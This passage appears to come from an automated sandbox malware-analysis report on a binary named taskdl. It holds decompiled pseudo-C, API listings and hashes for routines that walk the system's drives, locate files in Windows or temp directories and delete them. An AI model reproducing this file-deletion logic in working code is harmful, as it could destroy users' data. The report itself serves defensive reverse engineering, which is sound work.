                                  0x0040123e
                                  0x00401240
                                  0x00401240
                                  0x00401244
                                  0x00401245
                                  0x00401245
                                  0x0040124c
                                  0x0040124e
                                  0x00401250
                                  0x00401252
                                  0x00401254
                                  0x00401258
                                  0x0040125e
                                  0x00401261
                                  0x00401265
                                  0x00401265
                                  0x0040126b
                                  0x0040126f
                                  0x0040127a
                                  0x0040127c
                                  0x0040127e
                                  0x00401282
                                  0x00401288
                                  0x0040128b
                                  0x0040128f
                                  0x0040128f
                                  0x00401294
                                  0x00401299
                                  0x00401114
                                  0x00401114
                                  0x00401118
                                  0x0040111e
                                  0x00401125
                                  0x00401127
                                  0x0040112a
                                  0x0040112f
                                  0x00401132
                                  0x00401136
                                  0x00401136
                                  0x0040113b
                                  0x00401143
                                  0x00401143
                                  0x004012ab
                                  0x004012b8

                                  APIs
                                    • Part of subcall function 00401000: GetWindowsDirectoryW.KERNEL32(00000019,00000104,76C50F00,00000019,004010D5,?,?,76C50F00,00000019,76C53300,00000000), ref: 0040100C
                                    • Part of subcall function 00401000: GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
                                    • Part of subcall function 00401000: wcslen.MSVCRT ref: 00401035
                                    • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040103F
                                    • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040104D
                                  • swprintf.MSVCRT(?,00403040,?,00403050,76C53300,00000000), ref: 004010F5
                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00401107
                                  • swprintf.MSVCRT(?,00403034,?,?), ref: 00401168
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401177
                                  • wcslen.MSVCRT ref: 00401182
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 00401194
                                  • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(00000000), ref: 004011B6
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004011E7
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004011F6
                                  • FindClose.KERNEL32(00000000), ref: 00401205
                                  • DeleteFileW.KERNEL32(?), ref: 0040123A
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401258
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401282
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@wcslen$FileFind$swprintf$CloseDeleteDirectoryEos@?$basic_string@FirstGrow@?$basic_string@NextPathTempWindows
                                  • String ID:
                                  • API String ID: 2889739147-0
                                  • Opcode ID: d094fdb74faa2036a2288d1d3d1a61125983eed402f55e78df214a8260d1f803
                                  • Instruction ID: c02e7cbfb6260119d7520a8cc5a4b78e5b9d8733a8a6b2d1cbf059c3021fc26b
                                  • Opcode Fuzzy Hash: d094fdb74faa2036a2288d1d3d1a61125983eed402f55e78df214a8260d1f803
                                  • Instruction Fuzzy Hash: E551C3716043419FD720DF64C884B9BB7E9FBC8348F044A2EF589B32D1D6789945CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004018F6 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 71%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;

				_push(0xffffffff);
				_push(0x4020a8);
				_push(0x401a7c);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x403084 =  *0x403084 | 0xffffffff;
				 *0x403088 =  *0x403088 | 0xffffffff;
				 *(__p__fmode()) =  *0x403080;
				 *(__p__commode()) =  *0x40307c;
				 *0x40308c = _adjust_fdiv;
				_t27 = E00401A7B( *_adjust_fdiv);
				if( *0x403070 == 0) {
					__setusermatherr(E00401A78);
				}
				E00401A66(_t27);
				_push(0x40300c);
				_push(0x403008);
				L00401A60();
				_v112 =  *0x403078;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x403074,  &_v112);
				_push(0x403004);
				_push(0x403000);
				L00401A60();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E004012C0();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00401A5A();
				return _t41;
			}























                                  0x004018f9
                                  0x004018fb
                                  0x00401900
                                  0x0040190b
                                  0x0040190c
                                  0x00401919
                                  0x0040191e
                                  0x00401923
                                  0x0040192a
                                  0x00401931
                                  0x00401944
                                  0x00401952
                                  0x0040195b
                                  0x00401960
                                  0x0040196b
                                  0x00401972
                                  0x00401978
                                  0x00401979
                                  0x0040197e
                                  0x00401983
                                  0x00401988
                                  0x00401992
                                  0x004019ab
                                  0x004019b1
                                  0x004019b6
                                  0x004019bb
                                  0x004019c8
                                  0x004019ca
                                  0x004019d0
                                  0x00401a0c
                                  0x00401a11
                                  0x00401a12
                                  0x00401a12
                                  0x004019d2
                                  0x004019d2
                                  0x004019d2
                                  0x004019d3
                                  0x004019d6
                                  0x004019d8
                                  0x004019e3
                                  0x004019e5
                                  0x004019e5
                                  0x004019e6
                                  0x004019e6
                                  0x004019e3
                                  0x004019e9
                                  0x004019ed
                                  0x00000000
                                  0x00000000
                                  0x004019f3
                                  0x004019fa
                                  0x00401a04
                                  0x00401a19
                                  0x00401a06
                                  0x00401a06
                                  0x00401a06
                                  0x00401a1a
                                  0x00401a1b
                                  0x00401a1c
                                  0x00401a24
                                  0x00401a25
                                  0x00401a2a
                                  0x00401a2e
                                  0x00401a34
                                  0x00401a39
                                  0x00401a3b
                                  0x00401a3e
                                  0x00401a3f
                                  0x00401a40
                                  0x00401a47

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: 4015c31cfa7eab49e8c51e62fd741af3e0d2f81cb378811d4cbcafae977c22e0
                                  • Instruction ID: 68ab6ae738ded19f39d0610043d4fcd1ea5deb11ceedb7bb579f538117b6dbca
                                  • Opcode Fuzzy Hash: 4015c31cfa7eab49e8c51e62fd741af3e0d2f81cb378811d4cbcafae977c22e0
                                  • Instruction Fuzzy Hash: 42417EB5901344EFDB209FA4DA49A6ABFB8EB09715F20023FF581B72E1D6784940CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004012C0 Relevance: 4.5, APIs: 3, Instructions: 41sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 58 4012c0-4012db GetLogicalDrives 59 4012e0-401303 58->59 60 401305-40130f GetDriveTypeW 59->60 61 40131e-401322 59->61 60->61 62 401311-40131c call 401080 Sleep 60->62 61->59 63 401324-40132d 61->63 62->61
                                  C-Code - Quality: 100%
                                  			E004012C0() {
				intOrPtr _v4;
				short _v8;
				unsigned int _t8;
				int _t13;
				unsigned int _t15;
				signed int _t21;
				short* _t23;

				_t23 =  &_v8;
				_t8 = GetLogicalDrives(); // executed
				_t15 = _t8;
				_t21 = 0x19;
				do {
					_v8 =  *0x403060;
					_v4 =  *0x403064;
					_t3 = _t21 + 0x41; // 0x5a
					_v8 = _t3;
					if((_t15 >> _t21 & 0x00000001) != 0) {
						_t13 = GetDriveTypeW( &_v8); // executed
						if(_t13 != 4) {
							E00401080(_t21);
							_t23 =  &(_t23[2]);
							Sleep(0xa); // executed
						}
					}
					_t21 = _t21 - 1;
				} while (_t21 >= 2);
				return 0;
			}










                                  0x004012c0
                                  0x004012c7
                                  0x004012d9
                                  0x004012db
                                  0x004012e0
                                  0x004012eb
                                  0x004012ef
                                  0x004012f9
                                  0x004012fc
                                  0x00401303
                                  0x0040130a
                                  0x0040130f
                                  0x00401312
                                  0x00401317
                                  0x0040131c
                                  0x0040131c
                                  0x0040130f
                                  0x0040131e
                                  0x0040131f
                                  0x0040132d

                                  APIs
                                  • GetLogicalDrives.KERNELBASE ref: 004012C7
                                  • GetDriveTypeW.KERNELBASE(?,?,?,?,00000000,?,0000000A), ref: 0040130A
                                    • Part of subcall function 00401080: swprintf.MSVCRT(?,00403040,?,00403050,76C53300,00000000), ref: 004010F5
                                    • Part of subcall function 00401080: FindFirstFileW.KERNELBASE(?,?), ref: 00401107
                                  • Sleep.KERNELBASE(0000000A,00000000,?,0000000A), ref: 0040131C
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: DriveDrivesFileFindFirstLogicalSleepTypeswprintf
                                  • String ID:
                                  • API String ID: 570308627-0
                                  • Opcode ID: fac8c12e3c7440fa081a6b1de2581f42964eb1eb3cef597a2f435b430f1423df
                                  • Instruction ID: 4c7b1852939095ad3804a53ba97627e403d947e7219eb0394d6b0875d80bfcc1
                                  • Opcode Fuzzy Hash: fac8c12e3c7440fa081a6b1de2581f42964eb1eb3cef597a2f435b430f1423df
                                  • Instruction Fuzzy Hash: D9F0C8756043044BD310DF18ED4065B77A5EB99354F00053EED45B3390D776990DC6AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00401690 Relevance: 10.6, APIs: 7, Instructions: 139COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000,?,?), ref: 004016EE
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000,?,?), ref: 004016F6
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
                                  • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000,?), ref: 00401779
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000), ref: 004017BA
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                  • String ID:
                                  • API String ID: 2613176527-0
                                  • Opcode ID: d8cc844e41db627e1c4436b7b7a073ec45db5ac64ec8fc819127fe6e53c62420
                                  • Instruction ID: b735bfb2d4c14645f341b606901ad4f9af47e45cc28c7d2ea722b83d512bfbf9
                                  • Opcode Fuzzy Hash: d8cc844e41db627e1c4436b7b7a073ec45db5ac64ec8fc819127fe6e53c62420
                                  • Instruction Fuzzy Hash: 81410275300B008FC720DF19DAC4A6AB7E6FB89710B14897EE5569B7A0CB79AC01CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401000 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 96 401000-401020 GetWindowsDirectoryW 97 401022-40103c GetTempPathW wcslen 96->97 98 40105e-401070 swprintf 96->98 99 401073-401077 97->99 100 40103e-40104a wcslen 97->100 98->99 100->99 101 40104c-40105d wcslen 100->101
                                  C-Code - Quality: 100%
                                  			E00401000(intOrPtr _a4, wchar_t* _a8) {
				wchar_t* _t11;
				wchar_t* _t22;

				_t22 = _a8;
				GetWindowsDirectoryW(_t22, 0x104);
				_t11 = _a4 + 0x41;
				if(0 != _t11) {
					swprintf(_t22, 0x403010, _t11, 0x403020);
					goto L5;
				} else {
					GetTempPathW(0x104, _t22);
					if(wcslen(_t22) <= 0 ||  *((short*)(_t22 + wcslen(_t22) * 2 - 2)) != 0x5c) {
						L5:
						return _t22;
					} else {
						 *((short*)(_t22 + wcslen(_t22) * 2 - 2)) = 0;
						return _t22;
					}
				}
			}





                                  0x00401001
                                  0x0040100c
                                  0x0040101b
                                  0x00401020
                                  0x0040106a
                                  0x00000000
                                  0x00401022
                                  0x00401028
                                  0x0040103c
                                  0x00401073
                                  0x00401077
                                  0x0040104c
                                  0x00401052
                                  0x0040105d
                                  0x0040105d
                                  0x0040103c

                                  APIs
                                  • GetWindowsDirectoryW.KERNEL32(00000019,00000104,76C50F00,00000019,004010D5,?,?,76C50F00,00000019,76C53300,00000000), ref: 0040100C
                                  • GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
                                  • wcslen.MSVCRT ref: 00401035
                                  • wcslen.MSVCRT ref: 0040103F
                                  • wcslen.MSVCRT ref: 0040104D
                                  • swprintf.MSVCRT(00000019,00403010,?,00403020), ref: 0040106A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: wcslen$DirectoryPathTempWindowsswprintf
                                  • String ID:
                                  • API String ID: 30654359-0
                                  • Opcode ID: 4e66369f8c42ca16cc11ceda3156b996b8b268552c228e5f165bda1afb4dc665
                                  • Instruction ID: 00ede0775e497762771a1e7050bb3ecf99d0a0070f097ddb1d391ed7ba2ca3cf
                                  • Opcode Fuzzy Hash: 4e66369f8c42ca16cc11ceda3156b996b8b268552c228e5f165bda1afb4dc665
                                  • Instruction Fuzzy Hash: ADF0C87170122067E7206B2CBD0AE9F77A8EF85315B01403AF786B62D0D2B55A5586EE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004013D0 Relevance: 7.8, APIs: 5, Instructions: 264COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 102 4013d0-4013ec 103 4013f2-4013f7 102->103 104 40152b-401538 102->104 107 401404 103->107 108 4013f9-401402 103->108 105 4015e7-4015e9 104->105 106 40153e-40154e 104->106 109 401682-401689 105->109 110 4015ef-401600 105->110 111 401550 106->111 112 40157c-40158c 106->112 113 401406-401408 107->113 108->107 108->113 114 401602-401614 call 401690 110->114 115 40161e-401627 110->115 116 401554-401572 call 401690 111->116 119 4015a6-4015ad 112->119 120 40158e-40159c call 401690 112->120 117 40140a-40140c 113->117 118 40140e-401410 113->118 140 401616-40161a 114->140 125 401629-401645 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 115->125 126 40164f-401656 115->126 141 401574-401578 116->141 127 401413-40141b 117->127 118->127 121 4015b3-4015cb ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 119->121 122 40167f 119->122 137 40159e-4015a2 120->137 121->121 129 4015cd-4015e4 121->129 122->109 125->125 132 401647-40164b 125->132 126->122 133 401658 126->133 134 40141d 127->134 135 40141f-40143e ??2@YAPAXI@Z 127->135 132->126 142 40165c-401675 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 133->142 134->135 138 401440-401456 call 401690 135->138 139 401458-40145c 135->139 137->119 138->139 145 40147e-40148f 139->145 146 40145e 139->146 140->115 141->112 142->142 143 401677-40167b 142->143 143->122 149 401491 145->149 150 4014b5-4014bd 145->150 148 401462-40147c call 401690 146->148 148->145 152 401495-4014b3 call 401690 149->152 153 4014d0-4014f1 call 4018d0 150->153 154 4014bf-4014ce ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z 150->154 152->150 160 4014f3-401509 153->160 161 40150c-401528 153->161 154->153 154->154
                                  C-Code - Quality: 57%
                                  			E004013D0(signed int __ecx) {
				signed int _t67;
				signed int _t68;
				signed int _t73;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				intOrPtr _t81;
				intOrPtr _t91;
				intOrPtr _t95;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t101;
				signed int _t104;
				intOrPtr _t105;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t121;
				signed int _t127;
				intOrPtr _t135;
				signed int _t136;
				void* _t139;
				intOrPtr _t140;
				void* _t141;
				void* _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				void* _t146;
				signed int _t147;
				intOrPtr _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr _t152;
				signed int _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				signed int _t157;
				intOrPtr _t158;
				signed int _t159;
				void* _t160;
				void* _t161;

				_t109 = __ecx;
				_t144 =  *((intOrPtr*)(__ecx + 8));
				_t136 =  *(_t160 + 0x24);
				_t67 =  *((intOrPtr*)(__ecx + 0xc)) - _t144 >> 4;
				 *(_t160 + 0x10) = __ecx;
				if(_t67 >= _t136) {
					_t104 =  *(_t160 + 0x20);
					if(_t144 - _t104 >> 4 >= _t136) {
						if(_t136 > 0) {
							_t68 = _t136 << 4;
							_t139 = _t144 - _t68;
							_t156 = _t144;
							 *(_t160 + 0x20) = _t68;
							if(_t139 == _t144) {
								L37:
								_t140 =  *((intOrPtr*)(_t109 + 8));
								_t146 = _t140 - _t68;
								if(_t104 == _t146) {
									L40:
									_t141 = _t68 + _t104;
									_t147 = _t104;
									if(_t104 == _t141) {
										goto L44;
									}
									_t105 =  *((intOrPtr*)(_t160 + 0x28));
									do {
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t105, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
										_t147 = _t147 + 0x10;
									} while (_t147 != _t141);
									_t109 =  *(_t160 + 0x10);
									_t68 =  *(_t160 + 0x20);
									goto L44;
								} else {
									goto L38;
								}
								do {
									L38:
									_t146 = _t146 - 0x10;
									_t140 = _t140 - 0x10;
									__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t146, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
								} while (_t146 != _t104);
								_t109 =  *(_t160 + 0x10);
								_t68 =  *(_t160 + 0x20);
								goto L40;
							} else {
								goto L35;
							}
							do {
								L35:
								E00401690(__ecx, _t156, _t139);
								_t139 = _t139 + 0x10;
								_t160 = _t160 + 8;
								_t156 = _t156 + 0x10;
							} while (_t139 != _t144);
							_t109 =  *(_t160 + 0x10);
							_t68 =  *(_t160 + 0x20);
							goto L37;
						}
						return _t67;
					} else {
						_t157 = _t104;
						_t68 = _t136 << 4;
						 *(_t160 + 0x20) = _t68;
						_t127 = _t68 + _t104;
						if(_t104 != _t144) {
							 *(_t160 + 0x24) = _t127;
							do {
								E00401690(_t109,  *(_t160 + 0x24), _t157);
								_t116 =  *((intOrPtr*)(_t160 + 0x2c));
								_t157 = _t157 + 0x10;
								_t160 = _t160 + 8;
								_t109 = _t116 + 0x10;
								 *(_t160 + 0x24) = _t116 + 0x10;
							} while (_t157 != _t144);
							_t68 =  *(_t160 + 0x20);
							_t109 =  *(_t160 + 0x10);
						}
						_t148 =  *((intOrPtr*)(_t109 + 8));
						_t158 =  *((intOrPtr*)(_t160 + 0x28));
						_t142 = _t136 - (_t148 - _t104 >> 4);
						if(_t142 != 0) {
							do {
								E00401690(_t109, _t148, _t158);
								_t160 = _t160 + 8;
								_t148 = _t148 + 0x10;
								_t142 = _t142 - 1;
							} while (_t142 != 0);
							_t68 =  *(_t160 + 0x20);
							_t109 =  *(_t160 + 0x10);
						}
						_t143 =  *((intOrPtr*)(_t109 + 8));
						_t149 = _t104;
						if(_t104 == _t143) {
							L44:
							 *((intOrPtr*)(_t109 + 8)) =  *((intOrPtr*)(_t109 + 8)) + _t68;
							return _t68;
						} else {
							goto L31;
						}
						do {
							L31:
							__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t158, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
							_t149 = _t149 + 0x10;
						} while (_t149 != _t143);
						_t115 =  *(_t160 + 0x10);
						_t73 =  *(_t160 + 0x20);
						 *((intOrPtr*)(_t115 + 8)) =  *((intOrPtr*)( *(_t160 + 0x10) + 8)) + _t73;
						return _t73;
					}
				} else {
					_t117 =  *((intOrPtr*)(__ecx + 4));
					if(_t117 == 0) {
						L3:
						_t77 = _t136;
					} else {
						_t77 = _t144 - _t117 >> 4;
						if(_t136 >= _t77) {
							goto L3;
						}
					}
					if(_t117 != 0) {
						_t151 = _t144 - _t117 >> 4;
					} else {
						_t151 = 0;
					}
					_t78 = _t77 + _t151;
					 *(_t160 + 0x14) = _t78;
					if(_t78 < 0) {
						_t78 = 0;
					}
					_t79 = _t78 << 4;
					_push(_t79);
					L004018F0();
					_t159 =  *(_t160 + 0x14);
					 *(_t160 + 0x1c) = _t79;
					_t106 = _t79;
					_t152 =  *((intOrPtr*)(_t159 + 4));
					_t161 = _t160 + 4;
					if(_t152 !=  *(_t160 + 0x24)) {
						do {
							E00401690(_t117, _t106, _t152);
							_t101 =  *((intOrPtr*)(_t161 + 0x28));
							_t152 = _t152 + 0x10;
							_t161 = _t161 + 8;
							_t106 = _t106 + 0x10;
						} while (_t152 != _t101);
					}
					_t153 = _t106;
					if(_t136 > 0) {
						 *(_t161 + 0x24) = _t136;
						do {
							_t117 =  *((intOrPtr*)(_t161 + 0x28));
							E00401690( *((intOrPtr*)(_t161 + 0x28)), _t153,  *((intOrPtr*)(_t161 + 0x28)));
							_t98 =  *((intOrPtr*)(_t161 + 0x2c));
							_t161 = _t161 + 8;
							_t153 = _t153 + 0x10;
							_t99 = _t98 - 1;
							 *(_t161 + 0x24) = _t99;
						} while (_t99 != 0);
					}
					_t154 =  *((intOrPtr*)(_t161 + 0x20));
					_t81 = (_t136 << 4) + _t106;
					_t107 =  *((intOrPtr*)(_t159 + 8));
					if(_t154 != _t107) {
						 *((intOrPtr*)(_t161 + 0x20)) = _t81;
						do {
							_t81 = E00401690(_t117,  *((intOrPtr*)(_t161 + 0x20)), _t154);
							_t121 =  *((intOrPtr*)(_t161 + 0x28));
							_t154 = _t154 + 0x10;
							_t161 = _t161 + 8;
							_t117 = _t121 + 0x10;
							 *((intOrPtr*)(_t161 + 0x20)) = _t121 + 0x10;
						} while (_t154 != _t107);
					}
					_t108 =  *((intOrPtr*)(_t159 + 8));
					_t155 =  *((intOrPtr*)(_t159 + 4));
					while(_t155 != _t108) {
						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
						_t155 = _t155 + 0x10;
					}
					E004018D0(_t81,  *((intOrPtr*)(_t159 + 4)));
					_t135 =  *((intOrPtr*)(_t161 + 0x1c));
					_t119 =  *((intOrPtr*)(_t159 + 4));
					 *((intOrPtr*)(_t159 + 0xc)) = ( *(_t161 + 0x18) << 4) + _t135;
					if(_t119 != 0) {
						 *((intOrPtr*)(_t159 + 4)) = _t135;
						_t91 = (( *((intOrPtr*)(_t159 + 8)) - _t119 >> 4) + _t136 << 4) + _t135;
						 *((intOrPtr*)(_t159 + 8)) = _t91;
						return _t91;
					} else {
						 *((intOrPtr*)(_t159 + 4)) = _t135;
						_t95 = (_t136 << 4) + _t135;
						 *((intOrPtr*)(_t159 + 8)) = _t95;
						return _t95;
					}
				}
			}















































                                  0x004013d0
                                  0x004013d9
                                  0x004013dd
                                  0x004013e3
                                  0x004013e8
                                  0x004013ec
                                  0x0040152b
                                  0x00401538
                                  0x004015e9
                                  0x004015f2
                                  0x004015f6
                                  0x004015f8
                                  0x004015fc
                                  0x00401600
                                  0x0040161e
                                  0x0040161e
                                  0x00401623
                                  0x00401627
                                  0x0040164f
                                  0x0040164f
                                  0x00401652
                                  0x00401656
                                  0x00000000
                                  0x00000000
                                  0x00401658
                                  0x0040165c
                                  0x0040166a
                                  0x00401670
                                  0x00401673
                                  0x00401677
                                  0x0040167b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401629
                                  0x00401629
                                  0x0040162f
                                  0x00401632
                                  0x0040163d
                                  0x00401643
                                  0x00401647
                                  0x0040164b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00401602
                                  0x00401602
                                  0x00401604
                                  0x00401609
                                  0x0040160c
                                  0x0040160f
                                  0x00401612
                                  0x00401616
                                  0x0040161a
                                  0x00000000
                                  0x0040161a
                                  0x00401689
                                  0x0040153e
                                  0x00401540
                                  0x00401542
                                  0x00401547
                                  0x0040154b
                                  0x0040154e
                                  0x00401550
                                  0x00401554
                                  0x0040155a
                                  0x0040155f
                                  0x00401563
                                  0x00401566
                                  0x00401569
